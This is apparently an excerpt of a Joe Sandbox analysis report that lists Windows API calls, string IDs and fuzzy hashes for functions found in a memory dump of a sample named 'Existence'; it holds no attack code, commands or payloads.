                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 357397906-0
                                                                                                                                                                                          • Opcode ID: 42792877daf903bbf4712a743ac7cce98547cb2dcb644e3d6c0b6d1e84745189
                                                                                                                                                                                          • Instruction ID: 7be7bc255160051b6e7bee53b2836f4e96ebc69c6be0539d381b64e24310d06a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 42792877daf903bbf4712a743ac7cce98547cb2dcb644e3d6c0b6d1e84745189
                                                                                                                                                                                          • Instruction Fuzzy Hash: DB1140B9D00209AFDB51CFA8C884AEEBBF5FB08310F50816AE915E2650D735AA54CF55
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00793712
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00793723
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0079372A
                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00793731
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2710830443-0
                                                                                                                                                                                          • Opcode ID: 4ea1886eae9cf644cded87161597ab0b4138631707ae738e42dff7e12aeac86a
                                                                                                                                                                                          • Instruction ID: defb2ea59cbf3953d64b475b7902f99284b22bd343a7d99def7812765d444c88
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ea1886eae9cf644cded87161597ab0b4138631707ae738e42dff7e12aeac86a
                                                                                                                                                                                          • Instruction Fuzzy Hash: B8E06DB11012247BDA3017E2AC8DEEBBF6CDB42BE1F004029F105E2080DAA88941C2B1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00731F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00731F87
                                                                                                                                                                                            • Part of subcall function 00731F2D: SelectObject.GDI32(?,00000000), ref: 00731F96
                                                                                                                                                                                            • Part of subcall function 00731F2D: BeginPath.GDI32(?), ref: 00731FAD
                                                                                                                                                                                            • Part of subcall function 00731F2D: SelectObject.GDI32(?,00000000), ref: 00731FD6
                                                                                                                                                                                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 007C92E3
                                                                                                                                                                                          • LineTo.GDI32(?,?,?), ref: 007C92F0
                                                                                                                                                                                          • EndPath.GDI32(?), ref: 007C9300
                                                                                                                                                                                          • StrokePath.GDI32(?), ref: 007C930E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1539411459-0
                                                                                                                                                                                          • Opcode ID: e20663cf89f9f0bf22f407c3fcd91a5955fd2dc03496c25f06d799ba65daef17
                                                                                                                                                                                          • Instruction ID: b7ae212bdce0fad02eb5541dc562c2e3c3d3f8ad84ac2ec88c550cd950eabe94
                                                                                                                                                                                          • Opcode Fuzzy Hash: e20663cf89f9f0bf22f407c3fcd91a5955fd2dc03496c25f06d799ba65daef17
                                                                                                                                                                                          • Instruction Fuzzy Hash: D6F05431006259B7DB225F58AC0EFCE3F59AF09320F048009FA11210E1C7B959519BA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSysColor.USER32(00000008), ref: 007321BC
                                                                                                                                                                                          • SetTextColor.GDI32(?,?), ref: 007321C6
                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 007321D9
                                                                                                                                                                                          • GetStockObject.GDI32(00000005), ref: 007321E1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Color$ModeObjectStockText
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4037423528-0
                                                                                                                                                                                          • Opcode ID: 97f630192dffecfdad8345cb607b3e104fbb54de296f30448d4ff6730123410b
                                                                                                                                                                                          • Instruction ID: 6ae94489b74b239e57198f6fe49796a102a0dbd90258b6d102b0eaabc837dbf2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 97f630192dffecfdad8345cb607b3e104fbb54de296f30448d4ff6730123410b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FE06531240244AFDB315B74BC09BE87B11AB11335F08C22DF7B9940E1C7758A51AB15
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0078EC36
                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 0078EC40
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0078EC60
                                                                                                                                                                                          • ReleaseDC.USER32(?), ref: 0078EC81
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 89343585067bc96802870d3b48de96bc98b5b49390b629ed4c123f39bb1213ad
• Instruction ID: a94507db525b404c4c9520cfdacc29baef42140108c3b4edee98010ce75813a5
• Opcode Fuzzy Hash: 89343585067bc96802870d3b48de96bc98b5b49390b629ed4c123f39bb1213ad
• Instruction Fuzzy Hash: 19E0EEB0800204EFCB60AFA48908E6DBBB1BB08310F10846DE84AE3290CB3C5942EF18
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDesktopWindow.USER32 ref: 0078EC4A
• GetDC.USER32(00000000), ref: 0078EC54
• GetDeviceCaps.GDI32(00000000,0000000C), ref: 0078EC60
• ReleaseDC.USER32(?), ref: 0078EC81
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
• Opcode ID: 548b378a480650ecfa020bdbc113df23fa54c238288bbc2de94cf8e4ef232e4a
• Instruction ID: 744ab0179bde85aaad07124fc20643178cb6b4934e6fcac45f3737c6391ae78c
• Opcode Fuzzy Hash: 548b378a480650ecfa020bdbc113df23fa54c238288bbc2de94cf8e4ef232e4a
• Instruction Fuzzy Hash: E5E012B0C00204EFCB609FA4C80CA6DBBB1BB08310F10846DF84AE3290CB3C6902DF08
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: LoadString
• String ID: @COM_EVENTOBJ$bny
• API String ID: 2948472770-109409036
• Opcode ID: 5b7e8da9b6b009612302cc9112bdcecca5e552364987fe1bc20126783d878876
• Instruction ID: a87913d1e21283bcc6cd0562e5d46da57e44cda7c1ae4b3a044d328005b5520c
• Opcode Fuzzy Hash: 5b7e8da9b6b009612302cc9112bdcecca5e552364987fe1bc20126783d878876
• Instruction Fuzzy Hash: BFF19D70648300DFDB24EF18C885B6EB7E0BF84B14F14891DF58A9B261D779EA45CB92
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 007505B2: EnterCriticalSection.KERNEL32(0080170C,?,00000000,?,0073D22A,00803570,00000001,00000000,?,?,007AF023,?,?,00000000,00000001,?), ref: 007505BD
  • Part of subcall function 007505B2: LeaveCriticalSection.KERNEL32(0080170C,?,0073D22A,00803570,00000001,00000000,?,?,007AF023,?,?,00000000,00000001,?,00000001,00802430), ref: 007505FA
  • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
  • Part of subcall function 00750413: __onexit.LIBCMT ref: 00750419
• __Init_thread_footer.LIBCMT ref: 007B8658
  • Part of subcall function 00750568: EnterCriticalSection.KERNEL32(0080170C,00000000,?,0073D258,00803570,007727C9,00000001,00000000,?,?,007AF023,?,?,00000000,00000001,?), ref: 00750572
  • Part of subcall function 00750568: LeaveCriticalSection.KERNEL32(0080170C,?,0073D258,00803570,007727C9,00000001,00000000,?,?,007AF023,?,?,00000000,00000001,?,00000001), ref: 007505A5
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
• String ID: Variable must be of type 'Object'.$bny
• API String ID: 535116098-1424909381
• Opcode ID: 958231338409138327e7cc76fa468ddeabf5890dad38b172dbbd8dd6ef5e8290
• Instruction ID: 4497cd1c36e7a40de9301bbe7c638f5b38b9e82b528debfa372487b8523f0824
• Opcode Fuzzy Hash: 958231338409138327e7cc76fa468ddeabf5890dad38b172dbbd8dd6ef5e8290
• Instruction Fuzzy Hash: CE917C74A00208EFCB44EF94D895EEDB7B9FF04304F108159F916AB292DB79AE41CB52
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 007341EA: _wcslen.LIBCMT ref: 007341EF
• WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 007A5919
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Connection_wcslen
• String ID: *$LPT
• API String ID: 1725874428-3443410124
• Opcode ID: 131d02307f7b72e8daff763933e44c1810dc13dc63c2c5a9c13299c170c3af48
• Instruction ID: 8ce745a424c4a744234267c8db7806c14bf048051d0dec78c208efbc6d60a767
• Opcode Fuzzy Hash: 131d02307f7b72e8daff763933e44c1810dc13dc63c2c5a9c13299c170c3af48
• Instruction Fuzzy Hash: 7B919C75A00604DFDB14CF54C484EAABBF1BF85314F198199E84A9F362CB39EE85CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• __startOneArgErrorHandling.LIBCMT ref: 0075E67D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
• Opcode ID: 7aa9cb3c26ae38777ec5de9c06f4e6958ff5713d4b34071b3717004cd90478d8
• Instruction ID: 71a5dcd1a10fa32b37bc91b11082b13216692ed3af3d2e989ad2b7f5ad18ae8f
• Opcode Fuzzy Hash: 7aa9cb3c26ae38777ec5de9c06f4e6958ff5713d4b34071b3717004cd90478d8
• Instruction Fuzzy Hash: BE517B61E09106C6C75D7714CD053AA2BA4EB11781F308F5DFC92422E9EF7D8E8A9A47
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID:
• String ID: #
• API String ID: 0-1885708031
• Opcode ID: ec4b0422db2e41ed900583c38d8bf99505166f2571d96ff115efbc38d4abcc08
• Instruction ID: bf27fbbc79feb813e9d108e3e97025a7294b1a95aacf0191c4c75ba1989f5628
• Opcode Fuzzy Hash: ec4b0422db2e41ed900583c38d8bf99505166f2571d96ff115efbc38d4abcc08
• Instruction Fuzzy Hash: 50517732684287EFDB24EF28C445AFA7BA0EF15310FA44055F8919B2D1DB3CAD42CB52
Uniqueness

Uniqueness Score: -1.00%

APIs
• Sleep.KERNEL32(00000000), ref: 0074F6DB
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0074F6F4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: GlobalMemorySleepStatus
• String ID: @
• API String ID: 2783356886-2766056989
• Opcode ID: 3a7d2154a9947b2ef3c08fdb0e1bbfd70d61a4c0a9a9b4c0336662442e7df7a1
• Instruction ID: efdb95fa3a852329de65cd9dc4ed4fb15c2812925824952f88e64ff20f3f20d9
• Opcode Fuzzy Hash: 3a7d2154a9947b2ef3c08fdb0e1bbfd70d61a4c0a9a9b4c0336662442e7df7a1
• Instruction Fuzzy Hash: 785139B1408748DBE360AF10DC8ABABB7E8FB94304F81885DF1D9411A2DB749529CB67
Uniqueness

Uniqueness Score: -1.00%

APIs
• DestroyWindow.USER32(?,?,?,?), ref: 007C40BD
• MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007C40F8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Window$DestroyMove
• String ID: static
• API String ID: 2139405536-2160076837
• Opcode ID: cd537348c44005192ab0dcec1e781a1c59980dbd05a4f85d3d64ce90fb252cf5
• Instruction ID: 30211bc91ba4bdc2e89bb12fc3ac030a3ebf2bb1eee085881fdb643a6c1f29ff
• Opcode Fuzzy Hash: cd537348c44005192ab0dcec1e781a1c59980dbd05a4f85d3d64ce90fb252cf5
• Instruction Fuzzy Hash: 23319E71150604AADB24DF68CC94FFB77A9FF48724F00861DF9A587190DA79AC81CB60
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000027,00001132,00000000,?), ref: 007C50BD
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007C50D2
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: 3136aba693b3932512540fa8c049ede5e1f7ae0f563f2616eb280282af86f1e1
• Instruction ID: 0502bb073ae0594679e43d6e256d785616de5d848a2e6299085d4db9bc271be2
• Opcode Fuzzy Hash: 3136aba693b3932512540fa8c049ede5e1f7ae0f563f2616eb280282af86f1e1
• Instruction Fuzzy Hash: F631F474A0160A9FDB14CF69C980FDABBB5BB49300F10406EE904EB351D776A985CF90
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007C3D18
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007C3D23
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 37edff5a2d6f28eddc20d2b32546491df7613220817316619958e0db9067d11e
• Instruction ID: e7b60751cd46f832fff6a53f27ce13a1b2eddfe1a75a2bfffa868bd5f9da7da4
• Opcode Fuzzy Hash: 37edff5a2d6f28eddc20d2b32546491df7613220817316619958e0db9067d11e
• Instruction Fuzzy Hash: B811B671700208AFEF218F54DC84FFB3B6AEB843A4F10812CF91597290D6799D5187A0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00737873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 007378B1
  • Part of subcall function 00737873: GetStockObject.GDI32(00000011), ref: 007378C5
  • Part of subcall function 00737873: SendMessageW.USER32(00000000,00000030,00000000), ref: 007378CF
• GetWindowRect.USER32(00000000,?), ref: 007C4216
• GetSysColor.USER32(00000012), ref: 007C4230
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: fa60c8674f469c68ee7dd3700e3e7236443e61f8a239431dd851a55a25d335f4
• Instruction ID: 29b0248812590969961913c0d45dac918c00ca7543dbc44a934f2c8812e516b3
• Opcode Fuzzy Hash: fa60c8674f469c68ee7dd3700e3e7236443e61f8a239431dd851a55a25d335f4
• Instruction Fuzzy Hash: 3311F6B2610209AFDB11DFA8CC4AEEA7BA8FB08354F015528F955E3250D679E851DB60
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                          • CharUpperBuffW.USER32(?,?,?), ref: 0079761D
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00797629
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                          • String ID: STOP
                                                                                                                                                                                          • API String ID: 1256254125-2411985666
                                                                                                                                                                                          • Opcode ID: 391a389b367b62da96186ae6c90f349e4cd207b169b37eceaeb4a9ff10b8c053
                                                                                                                                                                                          • Instruction ID: 7ae1ea19e6fc1a2e07ca41d8bbc0ba6a72b8af7b7b3ff815f10756a9d2d6f2a3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 391a389b367b62da96186ae6c90f349e4cd207b169b37eceaeb4a9ff10b8c053
                                                                                                                                                                                          • Instruction Fuzzy Hash: A701C032A24A2A8BCF24AEBDEC449BF77B5BB60750B400528E42196291EB39D900C750
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                            • Part of subcall function 007945FD: GetClassNameW.USER32(?,?,000000FF), ref: 00794620
                                                                                                                                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00792699
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
